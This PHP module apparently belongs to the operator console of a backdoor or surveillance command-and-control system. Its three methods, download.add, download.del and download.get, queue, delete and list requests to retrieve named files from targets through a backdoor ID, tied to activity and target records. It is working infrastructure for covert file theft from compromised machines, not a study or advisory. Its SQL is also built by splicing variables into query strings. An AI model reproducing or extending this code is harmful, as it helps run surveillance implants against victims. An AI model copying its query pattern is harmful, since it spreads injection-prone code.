<?php

//////////
///
///   download.inc.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

$dm['download.add']  = array('func'   => 'download_add',
                             'perm'   => AL_TECH,
                             'escape' => true);

$dm['download.del']  = array('func'   => 'download_del',
                             'perm'   => AL_SERV | AL_TECH,
                             'escape' => true);

$dm['download.get']  = array('func'   => 'download_get',
                             'perm'   => AL_SERV | AL_TECH,
                             'escape' => true);



/***************\
*   FUNCTIONS   *
\***************/

function download_add($backdoor_id, $filename)
{
   if(!in_array($backdoor_id, $_SESSION['authbackdoorid'])) {
      return error('download', 'nosuchbackdoor');
   }

   $sql  = "SELECT `activity`.`activity_id` AS `activity_id`, ";
   $sql .=        "`activity`.`status` AS `status`, ";
   $sql .=        "`target`.`target_id` AS `target_id` ";
   $sql .= "FROM `activity` ";
   $sql .= "JOIN `target` ";
   $sql .= "USING (`activity_id`) ";
   $sql .= "JOIN `backdoor` ";
   $sql .= "USING (`target_id`) ";
   $sql .= "WHERE `backdoor_id` = '$backdoor_id'";

   $ret = db_query($sql);

   if(!is_success($ret)) {
      return $ret;
   } else if($ret['payload'] === false) {
      return error('download', 'nosuchbackdoor');
   }

   if($ret['payload'][0]->status == 'CLOSED') {
      return error('download', 'noperm');
   }

   $activity_id = $ret['payload'][0]->activity_id;
   $target_id = $ret['payload'][0]->target_id;

   $sql  = "INSERT INTO `download` (`backdoor_id`, ";
   $sql .=                       "`filename`) ";
   $sql .= "VALUES ('$backdoor_id', ";
   $sql .=         "'$filename')";

   $ret = db_query($sql);

   if(!is_success($ret)) {
      return $ret;
   }

   $sql = "SELECT LAST_INSERT_ID() AS `download_id`";

   $ret = db_query($sql);

   if(!is_success($ret)) {
      return $ret;
   }

   trace('download.add', "download_id={$ret['payload'][0]->download_id}", 0, 0, $activity_id, $target_id, $backdoor_id);

   return success((integer)$ret['payload'][0]->download_id);
}

function download_del($download_id)
{
   trace('download.del', "download_id=$download_id", 0, 0, 0, 0, 0);

   $sql  = "DELETE FROM `download` ";
   $sql .= "WHERE `download_id` = '$download_id'";
   $sql .= (($_SESSION['authlevel'] & AL_SERV) ? '' : " AND `backdoor_id` IN ('".implode("', '", $_SESSION['authbackdoorid'])."') ");

   return db_query($sql);
}

function download_get($backdoor_id)
{
   if(!($_SESSION['authlevel'] & AL_SERV) && !in_array($backdoor_id, $_SESSION['authbackdoorid'])) {
      return error('download', 'nosuchbackdoor');
   }

   $sql  = "SELECT `download_id`, ";
   $sql .=        "`filename` ";
   $sql .= "FROM `download` ";
   $sql .= "WHERE `backdoor_id` = '$backdoor_id'";

   $ret = db_query($sql);

   if(!is_success($ret)) {
      return $ret;
   } else if($ret['payload'] === false) {
      return success(array());
   }

   return $ret;
}

?>
